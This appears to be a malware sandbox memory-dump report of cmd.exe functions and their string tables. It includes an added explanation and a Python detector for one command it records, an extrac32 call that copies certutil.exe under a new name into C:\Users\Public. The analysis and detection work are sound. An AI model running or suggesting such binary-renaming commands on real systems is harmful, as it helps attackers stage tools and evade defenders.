• Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: ConsoleMode$Handle$wcsrchr$CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailureiswspacewcschr
                                                      • String ID:
                                                      • API String ID: 3829876242-3916222277
                                                      • Opcode ID: a065431fe6af81354ef476bd10952e9750a3a50c047aab405a5f97467c5f577a
                                                      • Instruction ID: 2c44bd73d188369a74776ba70537fb40c35159c8dce1fb845f5eb0028e06d019
                                                      • Opcode Fuzzy Hash: a065431fe6af81354ef476bd10952e9750a3a50c047aab405a5f97467c5f577a
                                                      • Instruction Fuzzy Hash: 63619026A0864296EB18EB11D40237AB7A1FF89B55F848236DE0E03794DFBDE405CB51
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
• Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: _wcsicmpmemset$Volume$DriveInformationNamePathType
                                                      • String ID: CSVFS$NTFS$REFS
                                                      • API String ID: 3510147486-2605508654
                                                      • Opcode ID: 25656f9dd7156011cddd26e1f63935c756ad3329fe6ff4f37f6319205113c483
                                                      • Instruction ID: d5109ec977ddfb670ce27ede2dd98124cdc1ebd0c64a30f435b3edf5cd48074b
                                                      • Opcode Fuzzy Hash: 25656f9dd7156011cddd26e1f63935c756ad3329fe6ff4f37f6319205113c483
                                                      • Instruction Fuzzy Hash: 12617032B04BC28AEB65DF21D8453E9B7A4FB45B85F848136DA0E8B758DFB8D104C711
                                                      APIs
                                                      • longjmp.MSVCRT(?,00000000,00000000,00007FF7E1DB7279,?,?,?,?,?,00007FF7E1DBBFA9), ref: 00007FF7E1DD4485
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
• Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: longjmp
                                                      • String ID: == $EQU $FOR$FOR /?$GEQ $GTR $IF /?$LEQ $LSS $NEQ $REM /?
                                                      • API String ID: 1832741078-366822981
                                                      • Opcode ID: 33da1405c176275929384e71d7b709e1d480dac8859b2aca32cf24daa89c1558
                                                      • Instruction ID: f2986dfb5bad7aab7f88fde25f359ef9a1f6a9f63bd8ddbb89306ee490ca39ef
                                                      • Opcode Fuzzy Hash: 33da1405c176275929384e71d7b709e1d480dac8859b2aca32cf24daa89c1558
                                                      • Instruction Fuzzy Hash: CBC19060F0C64292EB29FB165583BB8A391AB46B94FD14137DD0E93B91CFBCE4458363
                                                      APIs
                                                        • Part of subcall function 00007FF7E1DBCD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7E1DBB9A1,?,?,?,?,00007FF7E1DBD81A), ref: 00007FF7E1DBCDA6
                                                        • Part of subcall function 00007FF7E1DBCD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7E1DBB9A1,?,?,?,?,00007FF7E1DBD81A), ref: 00007FF7E1DBCDBD
                                                      • memset.MSVCRT ref: 00007FF7E1DBBA2B
                                                      • wcschr.MSVCRT ref: 00007FF7E1DBBA8A
                                                      • wcschr.MSVCRT ref: 00007FF7E1DBBAAA
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
• Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: Heapwcschr$AllocProcessmemset
                                                      • String ID: -$:.\$=,;$=,;+/[] "
                                                      • API String ID: 2872855111-969133440
                                                      • Opcode ID: e048727378a3460f555082e81c55544313692faeaf2a868744a414ec58a8adda
                                                      • Instruction ID: aa631f811c27f997e82a5448d44456c70c6c72255aca884d1ccd4520888a0ccb
                                                      • Opcode Fuzzy Hash: e048727378a3460f555082e81c55544313692faeaf2a868744a414ec58a8adda
                                                      • Instruction Fuzzy Hash: CFB19021A0CA4291EB70EB15A48677EA6A0FF48B80FC54237CA5F43794DFBCE441C362
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
• Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: longjmp$Heap$AllocByteCharMultiProcessWidememmovememset
                                                      • String ID: 0123456789$extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                                                      • API String ID: 1606811317-2340392073
                                                      • Opcode ID: 8103515748828c6243a0f650469ddac0473b2fcaea6880b388f8c0650ade34ac
                                                      • Instruction ID: 56dea98b3dd7c6bdad57e94b43cbcc176b0d99688921cfd50420ee9cf5b225a1
                                                      • Opcode Fuzzy Hash: 8103515748828c6243a0f650469ddac0473b2fcaea6880b388f8c0650ade34ac
                                                      • Instruction Fuzzy Hash: D1D1C125E08A4691E710EB15A8027B9F7A0FF45B90FC44233DA5E437A8DFBCE515C762
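The command string in this function's string table, `extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe`, is the concrete evidence behind the "Drops or copies certutil.exe with a different name" signature: extrac32's /C switch copies a single file to a destination and /Y suppresses the overwrite prompt, so a signed cabinet tool does the copy instead of `copy` or `certutil`, which is what a naive rule would watch. (The surrounding strings such as `FOR /?`, `IF /?` and `Ungetting: '%s'` are cmd.exe's own parser strings, so this dump is the command interpreter holding the batch line it is about to run.) The following Python is an added detection example, not part of the Joe Sandbox report: it parses constructed, tab-separated process-creation records (ProcessId, Image, CommandLine), recognises the extrac32 copy form, and flags copies of watched system binaries into user-writable directories. The record layout, the sample lines, the watched-binary set and the writable-path list are assumptions made for the demo.

```python
"""Flag extrac32 being used to copy a system binary into a user-writable path.

Added example for this report; it is not Joe Sandbox's code. The log text is
constructed to look like a tab-separated export of process-creation events
(ProcessId, Image, CommandLine); the field layout, the watched-binary set and
the writable-directory list are assumptions for the demo.
"""
import shlex
from dataclasses import dataclass

# Binaries the report's signatures say were dropped under a different name.
WATCHED_BINARIES = {"certutil.exe", "cmd.exe"}

# Paths an unprivileged user can write to (assumption: extend per environment).
USER_WRITABLE_PREFIXES = (
    "c:\\users\\public\\",
    "c:\\users\\",
    "c:\\programdata\\",
    "c:\\windows\\temp\\",
)

# Constructed sample log. The first command line is the string from the dump,
# doubled backslashes included; the rest are made up for contrast.
SAMPLE_LOG = "\n".join("\t".join(row) for row in [
    ("1234", r"C:\Windows\System32\extrac32.exe",
     r"extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe"),
    ("1235", r"C:\Windows\System32\extrac32.exe",
     r"extrac32.exe /C /Y C:\Windows\System32\cmd.exe C:\Users\Public\a.exe"),
    ("1236", r"C:\Windows\System32\extrac32.exe",
     r'extrac32 /C /Y C:\Windows\System32\certutil.exe "C:\Program Files\Tools\certutil.exe"'),
    ("1237", r"C:\Windows\System32\extrac32.exe",
     r"extrac32 /Y C:\Temp\update.cab C:\Temp\out"),
    ("1238", r"C:\Windows\System32\cmd.exe",
     r"cmd.exe /c echo hello"),
])


@dataclass
class Finding:
    pid: int
    source: str
    destination: str
    reason: str


def _normalize(path: str) -> str:
    """Lower-case, strip surrounding quotes, collapse doubled backslashes."""
    path = path.strip('"').lower()
    while "\\\\" in path:
        path = path.replace("\\\\", "\\")
    return path


def _basename(path: str) -> str:
    return _normalize(path).rsplit("\\", 1)[-1]


def parse_extrac32_copy(command_line: str):
    """Return (source, destination) when the line is an extrac32 /C copy.

    extrac32's /C switch copies one file to a destination; /Y only suppresses
    the overwrite prompt. Cabinet-extraction invocations (no /C) return None.
    """
    try:
        # Non-POSIX mode keeps backslashes literal and honours "quoted paths".
        argv = shlex.split(command_line, posix=False)
    except ValueError:
        return None
    if not argv or _basename(argv[0]) not in ("extrac32", "extrac32.exe"):
        return None
    switches = {a.lower() for a in argv[1:] if a.startswith("/")}
    operands = [a for a in argv[1:] if not a.startswith("/")]
    if "/c" not in switches or len(operands) != 2:
        return None
    return _normalize(operands[0]), _normalize(operands[1])


def load_events(text: str):
    """Parse the constructed tab-separated export into event dicts."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        pid, image, cmd = line.split("\t", 2)
        events.append({"ProcessId": int(pid), "Image": image, "CommandLine": cmd})
    return events


def detect(events):
    """Return a Finding for every extrac32 copy of a watched binary into a
    user-writable directory; renaming on the way is noted in the reason."""
    findings = []
    for ev in events:
        if _basename(ev["Image"]) != "extrac32.exe":
            continue
        copy = parse_extrac32_copy(ev["CommandLine"])
        if copy is None:
            continue
        src, dst = copy
        src_name, dst_name = src.rsplit("\\", 1)[-1], dst.rsplit("\\", 1)[-1]
        if src_name not in WATCHED_BINARIES or not dst.startswith(USER_WRITABLE_PREFIXES):
            continue
        reason = f"{src_name} copied by extrac32 into a user-writable path"
        if dst_name != src_name:
            reason += " under a different name"
        findings.append(Finding(ev["ProcessId"], src, dst, reason))
    return findings


if __name__ == "__main__":
    for f in detect(load_events(SAMPLE_LOG)):
        print(f"pid {f.pid}: {f.reason}: {f.source} -> {f.destination}")
```

Matching on the parsed operands rather than on a substring of the command line is what keeps the rule honest: the `/C` form is the copy primitive, the doubled backslashes in the dumped string still resolve to System32, and a copy to a non-writable destination (the `Program Files` line) is deliberately left alone so the rule stays specific to staging in user-writable paths.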
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
• Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: memset$ErrorLast$InformationVolume
                                                      • String ID: %04X-%04X$~
                                                      • API String ID: 2748242238-2468825380
                                                      • Opcode ID: 527acd2d5873e217b6583c2a0f855b60256f074d3be57f79744cf5756af0c24e
                                                      • Instruction ID: 9149d1103da0d13986234c1db232cb06b2649f0f38415d4def51de95417bca1a
                                                      • Opcode Fuzzy Hash: 527acd2d5873e217b6583c2a0f855b60256f074d3be57f79744cf5756af0c24e
                                                      • Instruction Fuzzy Hash: E4A1B222B08BC58AEB25EF2098413EDB7A1FB85785F908136DA4D4BB88DF7CD205C711
                                                      APIs
                                                      • wcschr.MSVCRT(?,?,?,?,?,?,?,00007FF7E1DC6570,?,?,?,?,?,?,00000000,00007FF7E1DC6488), ref: 00007FF7E1DC6677
                                                      • iswdigit.MSVCRT(?,?,?,?,?,?,?,00007FF7E1DC6570,?,?,?,?,?,?,00000000,00007FF7E1DC6488), ref: 00007FF7E1DC668F
                                                      • _errno.MSVCRT ref: 00007FF7E1DC66A3
                                                      • wcstol.MSVCRT ref: 00007FF7E1DC66C4
                                                      • iswdigit.MSVCRT(?,?,?,?,?,?,?,00007FF7E1DC6570,?,?,?,?,?,?,00000000,00007FF7E1DC6488), ref: 00007FF7E1DC66E4
                                                      • iswalpha.MSVCRT(?,?,?,?,?,?,?,00007FF7E1DC6570,?,?,?,?,?,?,00000000,00007FF7E1DC6488), ref: 00007FF7E1DC66FE
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
• Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: iswdigit$_errnoiswalphawcschrwcstol
                                                      • String ID: +-~!$APerformUnaryOperation: '%c'
                                                      • API String ID: 2348642995-441775793
                                                      • Opcode ID: 3043d5b8b3736d8e68c05dd1a897401147fff5d71c47df5c8b899d9aaf2ce369
                                                      • Instruction ID: ca8143f6e47332e88ab069ff67c314f5b3a21bba278fb472dbcc5122a00a3721
                                                      • Opcode Fuzzy Hash: 3043d5b8b3736d8e68c05dd1a897401147fff5d71c47df5c8b899d9aaf2ce369
                                                      • Instruction Fuzzy Hash: FF719172D0864685EB60AF11D412379F7A0EB45B45F94C833DA5E82794EFBCE484C7A2
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
• Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: memset$ErrorInformationLastVolume_wcsicmptowupper
                                                      • String ID: FAT$~
                                                      • API String ID: 2238823677-1832570214
                                                      • Opcode ID: 9870e3df3003cca21a2b5bb6f1f08ea82d43fbeeb1162d01b560e5e2cc2d055c
                                                      • Instruction ID: f8d81f298efa54a0f6df4630331f2190fc4e62be85a8a291506fb250954b2e0b
                                                      • Opcode Fuzzy Hash: 9870e3df3003cca21a2b5bb6f1f08ea82d43fbeeb1162d01b560e5e2cc2d055c
                                                      • Instruction Fuzzy Hash: FE71C072A08BC199EB25EF20D8417EAB7A0FB45785F808436DA4E4BB58DF7CD245C711
                                                      APIs
                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF7E1DBFE2A), ref: 00007FF7E1DBD884
                                                      • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF7E1DBFE2A), ref: 00007FF7E1DBD89D
                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF7E1DBFE2A), ref: 00007FF7E1DBD94D
                                                      • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF7E1DBFE2A), ref: 00007FF7E1DBD964
                                                      • _wcsnicmp.MSVCRT ref: 00007FF7E1DBDB89
                                                      • wcstol.MSVCRT ref: 00007FF7E1DBDBDF
                                                      • wcstol.MSVCRT ref: 00007FF7E1DBDC63
                                                      • memmove.MSVCRT ref: 00007FF7E1DBDD33
                                                      • memmove.MSVCRT ref: 00007FF7E1DBDE9A
                                                      • longjmp.MSVCRT(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF7E1DBFE2A), ref: 00007FF7E1DBDF1F
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
• Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: Heap$AllocProcessmemmovewcstol$_wcsnicmplongjmp
                                                      • String ID:
                                                      • API String ID: 1051989028-0
                                                      • Opcode ID: 64565f03666b4bb772596797247e6bb6fdde89d50adaa5f7e3853eb5f84ddd48
                                                      • Instruction ID: b76d20905de31954197f75d522122410a9510c64791772ac05eb4744c54fba0c
                                                      • Opcode Fuzzy Hash: 64565f03666b4bb772596797247e6bb6fdde89d50adaa5f7e3853eb5f84ddd48
                                                      • Instruction Fuzzy Hash: 8502A376A0CB4191EB24EF15E4417BAF6A1FB48B98F944132DA8E03794DFBCE451C721
                                                      Similarity
                                                      • API ID: Heap$_wcsicmp$AllocProcess
                                                      • String ID: DISABLEDELAYEDEXPANSION$DISABLEEXTENSIONS$ENABLEDELAYEDEXPANSION$ENABLEEXTENSIONS
                                                      • API String ID: 3223794493-3086019870
                                                      • Opcode ID: d222a0f06bbbc582554831b5995f9d518337be47592992ae4180831db5f06540
                                                      • Instruction ID: ca804720800a187d85eb06eb867aab45701d57453f7ed891932efa93b519e904
                                                      • Opcode Fuzzy Hash: d222a0f06bbbc582554831b5995f9d518337be47592992ae4180831db5f06540
                                                      • Instruction Fuzzy Hash: 0151C565E08B4296EB05EB15E402379BBA0FF49B91F948537C91E433A4DFBCE050C762
                                                      Similarity
                                                      • API ID:
                                                      • String ID: EQU$GEQ$GTR$LEQ$LSS$NEQ
                                                      • API String ID: 0-3124875276
                                                      • Opcode ID: 27546f26981fd3a6242742626cf9575fc19742bdde1af1eb23768a0abe577f48
                                                      • Instruction ID: acac2107cf762a0ee8e574434bffe90ef86d7d7f8d5621a0e2d88007cd44ba83
                                                      • Opcode Fuzzy Hash: 27546f26981fd3a6242742626cf9575fc19742bdde1af1eb23768a0abe577f48
                                                      • Instruction Fuzzy Hash: 7E515D60E0C64381FB14FF24E4163B9A7A4AF95B46FC08437D64E862A4DFBCA445C7A2
                                                      APIs
                                                        • Part of subcall function 00007FF7E1DC58E4: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00007FF7E1DDC6DB), ref: 00007FF7E1DC58EF
                                                        • Part of subcall function 00007FF7E1DC081C: GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF7E1DC084E
                                                      • towupper.MSVCRT ref: 00007FF7E1DDC1C9
                                                      • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7E1DDC31C
                                                      • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0 ref: 00007FF7E1DDC5CB
                                                      Similarity
                                                      • API ID: CriticalDriveEnterEnvironmentFreeLocalSectionTypeVariabletowupper
                                                      • String ID: %s $%s>$PROMPT$Unknown$\$extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe $x
                                                      • API String ID: 2242554020-619615743
                                                      • Opcode ID: 4a922d4c85f00677817b5c761d16b1de45b4041caf2284929607811bb1d70d1e
                                                      • Instruction ID: 524f4a24d3745c98c4f9fcbeebf589cec0c5e1ad0c88d3084e5385e8a2d980d0
                                                      • Opcode Fuzzy Hash: 4a922d4c85f00677817b5c761d16b1de45b4041caf2284929607811bb1d70d1e
                                                      • Instruction Fuzzy Hash: E4128421A0865281EB24FB15A44637AE7A0EF44BA4FD4433BE99D437E4DFBCE541C722
                                                      APIs
                                                      • memset.MSVCRT ref: 00007FF7E1DC7013
                                                      • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7E1DC7123
                                                        • Part of subcall function 00007FF7E1DC1EA0: wcschr.MSVCRT(?,?,?,00007FF7E1DB286E,00000000,00000000,00000000,00000000,00000000,0000000A,?,00007FF7E1DE0D54), ref: 00007FF7E1DC1EB3
                                                      • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7E1DC706E
                                                      • wcsncmp.MSVCRT ref: 00007FF7E1DC70A5
                                                      • wcsstr.MSVCRT ref: 00007FF7E1DCF9DB
                                                      • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7E1DCFA00
                                                      • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7E1DCFA5F
                                                        • Part of subcall function 00007FF7E1DC823C: FindFirstFileExW.KERNELBASE ref: 00007FF7E1DC8280
                                                        • Part of subcall function 00007FF7E1DC823C: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7E1DC829D
                                                        • Part of subcall function 00007FF7E1DC3A0C: FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF7E1DDEAC5,?,?,?,00007FF7E1DDE925,?,?,?,?,00007FF7E1DBB9B1), ref: 00007FF7E1DC3A56
                                                      • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7E1DCFA3D
                                                      Similarity
                                                      • API ID: File$AttributesFindmemset$CloseDriveErrorFirstFullLastNamePathTypewcschrwcsncmpwcsstr
                                                      • String ID: \\.\
                                                      • API String ID: 799470305-2900601889
                                                      • Opcode ID: 1d9e630e3dc056cac36988160209897b6a55c82e5470b3b56a9f5e981f117f56
                                                      • Instruction ID: b9ff8659ee4042d14d972cfa63466512e3c501d499e7e69522e915b0ec9c38ff
                                                      • Opcode Fuzzy Hash: 1d9e630e3dc056cac36988160209897b6a55c82e5470b3b56a9f5e981f117f56
                                                      • Instruction Fuzzy Hash: 4E51E732A08A8286EB60EF20D8013F9F7A1FB85B54F859936DA0E47794DF7CD445C761
                                                      Similarity
                                                      • API ID: _wcsicmpwcschr$AttributesErrorFileLastwcsrchr
                                                      • String ID:
                                                      • API String ID: 1944892715-0
                                                      • Opcode ID: b04fd89d1b32d74b41568e07ffd85bc9ccdf1354646f06c8d836b15a263e4c9a
                                                      • Instruction ID: 4fae3313f8db642cff3b8e40c8fdeff9bff82b40ccb9475d023abd769970c4af
                                                      • Opcode Fuzzy Hash: b04fd89d1b32d74b41568e07ffd85bc9ccdf1354646f06c8d836b15a263e4c9a
                                                      • Instruction Fuzzy Hash: AAB1AD61A0964296EB24FF11A452779E7A0FF59B81FD88537CA4F47390DEBCE480C722
                                                      APIs
                                                        • Part of subcall function 00007FF7E1DC3578: _get_osfhandle.MSVCRT ref: 00007FF7E1DC3584
                                                        • Part of subcall function 00007FF7E1DC3578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF7E1DB32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7E1DC359C
                                                        • Part of subcall function 00007FF7E1DC3578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF7E1DB32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7E1DC35C3
                                                        • Part of subcall function 00007FF7E1DC3578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7E1DB32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7E1DC35D9
                                                        • Part of subcall function 00007FF7E1DC3578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF7E1DB32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7E1DC35ED
                                                        • Part of subcall function 00007FF7E1DC3578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7E1DB32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7E1DC3602
                                                      • _get_osfhandle.MSVCRT ref: 00007FF7E1DB54DE
                                                      • WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(?,?,00007FF7E1DB1F7D), ref: 00007FF7E1DB552B
                                                      • WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00007FF7E1DB1F7D), ref: 00007FF7E1DB554F
                                                      • _get_osfhandle.MSVCRT ref: 00007FF7E1DD345F
                                                      • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00007FF7E1DB1F7D), ref: 00007FF7E1DD347E
                                                      • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00007FF7E1DB1F7D), ref: 00007FF7E1DD34C3
                                                      • _get_osfhandle.MSVCRT ref: 00007FF7E1DD34DB
                                                      • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00007FF7E1DB1F7D), ref: 00007FF7E1DD34FA
                                                        • Part of subcall function 00007FF7E1DC36EC: _get_osfhandle.MSVCRT ref: 00007FF7E1DC3715
                                                        • Part of subcall function 00007FF7E1DC36EC: WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF7E1DC3770
                                                        • Part of subcall function 00007FF7E1DC36EC: WriteFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7E1DC3791
                                                      Similarity
                                                      • API ID: _get_osfhandle$ConsoleWrite$File$ByteCharLockModeMultiSharedWide$AcquireHandleReleaseTypewcschr
                                                      • String ID:
                                                      • API String ID: 1356649289-0
